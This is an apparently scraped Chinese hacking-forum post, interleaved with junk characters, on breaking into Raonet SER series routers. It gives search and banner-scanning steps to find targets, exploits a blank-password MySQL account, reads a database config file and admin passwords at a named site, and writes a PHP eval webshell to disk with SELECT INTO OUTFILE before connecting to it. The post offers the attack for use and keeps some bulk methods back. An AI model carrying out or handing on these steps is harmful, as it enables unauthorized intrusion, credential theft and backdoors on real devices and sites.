寻找存在漏洞的路由器方法:0 d; I N: }& G- W; b" m" T
p% J' ^+ e( z
1:google搜索'Raonet Subscriber Ethernet Router'
: G, H& r6 J3 {6 T) E4 u1 C: C) C& O0 y: `/ @ s; d6 o# r
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
; W9 p- j4 c! ]: }) l& U* D2 B) ~7 z' \
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。4 ~" B* ?7 T7 d0 t* w
2 r5 _, Z2 Q" j
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......: G5 H1 B: K# d7 D. w
( p* D7 N2 w. q* I. s- c( s
& v" w) e. L$ b# l) n
( V; k8 m( b2 V7 f8 Q
入侵步骤:& _9 d. M7 D5 g' `! r8 p
v) S( [( o3 }4 n0 i
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
8 n- ^4 U, J/ ~; O7 J+ _/ ^5 ]
4 n: X g' W6 P6 Q9 J2 l$ d+ @7 k2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc! z* h0 W2 n! e: L1 a6 `
3:得到密码后连接,查看GUI管理密码:* U5 N. p8 [ X; u7 [
use ser_500) h) h1 X, Q1 i9 e7 Q$ D. O
select id,passwd from user;
) z8 i( `7 d$ U6 i4:通过数据库写入webshell,执行命令:
' I; K* }6 K* k5 euse mysql;8 ]: m/ `* f% u3 N; Y4 s
create table ok(cmd TEXT);
8 q- y+ ~9 z( Z) X3 cinsert into ok values("<?php @eval($_POST[cmd])?>");
9 ?$ E. f* M3 D8 m$ Y% C$ hselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
4 `2 o( P- W% Xdrop table ok;
& ?9 ^2 U2 d# v2 Z/ |1 Z
0 f0 l2 C; f9 @# {/ r5 F5:连接后门shell.php . N: U7 W" k- }3 R
5 g$ b1 R- i; T
6. 搞定!
3 W7 f$ Q# F5 B* _9 Y0 V7 A# z% F
|